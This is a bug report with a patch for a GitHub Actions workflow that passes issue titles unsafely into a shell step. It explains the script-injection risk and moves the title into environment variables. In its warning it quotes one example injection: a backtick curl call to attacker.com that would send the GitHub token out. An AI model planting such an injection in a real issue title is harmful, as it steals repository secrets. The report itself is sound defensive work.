CI: create-branch-from-issue workflow fails when issue title contains shell-special characters

## Summary

The `create-branch-from-issue.yml` workflow fails when the issue title contains shell-special characters (backticks, `$()`, `"`, etc.) because the title is interpolated directly into a `run:` block via `${{ }}` expressions.

## Symptoms

For issue [#529](https://github.com/pedrazamiguez/expense-share-app/issues/529) with title:

```
Fix Firestore `is`-prefix deserialization warnings in `ExpenseSplitDocument`
```

The workflow fails with:

```
/home/runner/work/_temp/cdfe006a-....sh: line 2: is: command not found
/home/runner/work/_temp/cdfe006a-....sh: line 2: ExpenseSplitDocument: command not found
Error: Process completed with exit code 127.
```

## Root Cause

On [line 22](https://github.com/pedrazamiguez/expense-share-app/blob/develop/.github/workflows/create-branch-from-issue.yml#L22), the issue title is interpolated directly into the shell script:

```yaml
run: |
  ISSUE_NUMBER=${{ github.event.issue.number }}
  TITLE="${{ github.event.issue.title }}"          # ← DANGEROUS
```

GitHub replaces `${{ }}` expressions **before** the shell evaluates the script, producing:

```bash
TITLE="Fix Firestore `is`-prefix deserialization warnings in `ExpenseSplitDocument`"
```

In bash, **backticks inside double quotes are command substitution**. The shell tries to execute `` `is` `` and `` `ExpenseSplitDocument` `` as commands — hence the `command not found` errors.

> ⚠️ **This is also a script injection vector.** A maliciously crafted issue title containing `` `curl attacker.com/steal?token=$GH_TOKEN` `` could exfiltrate secrets. See [GitHub docs: security hardening — script injection](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections).

## Proposed Fix

**Never use `${{ }}` with user-controlled input inside `run:` blocks.** Instead, pass it as an environment variable — the value is then a literal string with no shell interpretation:

```diff
      - name: Extract issue details and determine branch type
        id: extract
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+         ISSUE_TITLE: ${{ github.event.issue.title }}
+         ISSUE_NUMBER: ${{ github.event.issue.number }}
        run: |
-         ISSUE_NUMBER=${{ github.event.issue.number }}
-         TITLE="${{ github.event.issue.title }}"
-         echo "issue_number=$ISSUE_NUMBER" >> $GITHUB_OUTPUT
-         echo "issue_title=$TITLE" >> $GITHUB_OUTPUT
+         echo "issue_number=$ISSUE_NUMBER" >> "$GITHUB_OUTPUT"
+         echo "issue_title=$ISSUE_TITLE" >> "$GITHUB_OUTPUT"
```

The `ISSUE_NUMBER` substitution on line 21 is technically safe (always an integer), but should be moved to `env:` as well for consistency and defense-in-depth.

All **downstream steps** already consume the title via `env:` variables (e.g., `TITLE: ${{ steps.extract.outputs.issue_title }}`), so they are not affected.

## Affected File

`.github/workflows/create-branch-from-issue.yml` — line 21–24

## References

- [GitHub Security Hardening — Script Injection](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)
- Failed run triggered by [#529](https://github.com/pedrazamiguez/expense-share-app/issues/529)

--- a/.github/workflows/create-branch-from-issue.yml
+++ b/.github/workflows/create-branch-from-issue.yml
@@ -17,11 +17,11 @@ jobs:
         id: extract
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          ISSUE_NUMBER: ${{ github.event.issue.number }}
         run: |
-          ISSUE_NUMBER=${{ github.event.issue.number }}
-          TITLE="${{ github.event.issue.title }}"
-          echo "issue_number=$ISSUE_NUMBER" >> $GITHUB_OUTPUT
-          echo "issue_title=$TITLE" >> $GITHUB_OUTPUT
+          echo "issue_number=$ISSUE_NUMBER" >> "$GITHUB_OUTPUT"
+          echo "issue_title=$ISSUE_TITLE" >> "$GITHUB_OUTPUT"
           
           # 1. Get issue labels
           LABELS=$(gh api repos/${{ github.repository }}/issues/$ISSUE_NUMBER --jq '.labels[].name' | tr '\n' ' ')
@@ -58,10 +58,10 @@ jobs:
             BASE_BRANCH="develop"
           fi
           
-          echo "branch_type=$BRANCH_TYPE" >> $GITHUB_OUTPUT
-          echo "base_branch=$BASE_BRANCH" >> $GITHUB_OUTPUT
-          echo "auto_pr=$AUTO_PR" >> $GITHUB_OUTPUT
-          echo "target_branch=$TARGET_BRANCH" >> $GITHUB_OUTPUT
+          echo "branch_type=$BRANCH_TYPE" >> "$GITHUB_OUTPUT"
+          echo "base_branch=$BASE_BRANCH" >> "$GITHUB_OUTPUT"
+          echo "auto_pr=$AUTO_PR" >> "$GITHUB_OUTPUT"
+          echo "target_branch=$TARGET_BRANCH" >> "$GITHUB_OUTPUT"
 
       - name: Check and Create branch
         id: create_ref
@@ -72,12 +72,12 @@ jobs:
           BASE_BRANCH: ${{ steps.extract.outputs.base_branch }}
         run: |
           BRANCH_NAME="$BRANCH_TYPE/EXSHAPP-$(printf "%04d" $ISSUE_NUMBER)"
-          echo "branch_name=$BRANCH_NAME" >> $GITHUB_OUTPUT
+          echo "branch_name=$BRANCH_NAME" >> "$GITHUB_OUTPUT"
 
           # Check if the branch already exists
           if gh api repos/${{ github.repository }}/git/ref/heads/$BRANCH_NAME > /dev/null 2>&1; then
             echo "⚠️ Branch $BRANCH_NAME already exists."
-            echo "created=false" >> $GITHUB_OUTPUT
+            echo "created=false" >> "$GITHUB_OUTPUT"
           else
             echo "🚀 Creating branch $BRANCH_NAME from $BASE_BRANCH..."
           
@@ -87,7 +87,7 @@ jobs:
               -f ref="refs/heads/$BRANCH_NAME" \
               -f sha=$(gh api repos/${{ github.repository }}/git/refs/heads/$BASE_BRANCH -q .object.sha)
           
-            echo "created=true" >> $GITHUB_OUTPUT
+            echo "created=true" >> "$GITHUB_OUTPUT"
           fi
 
       # Automatically create PR for releases only

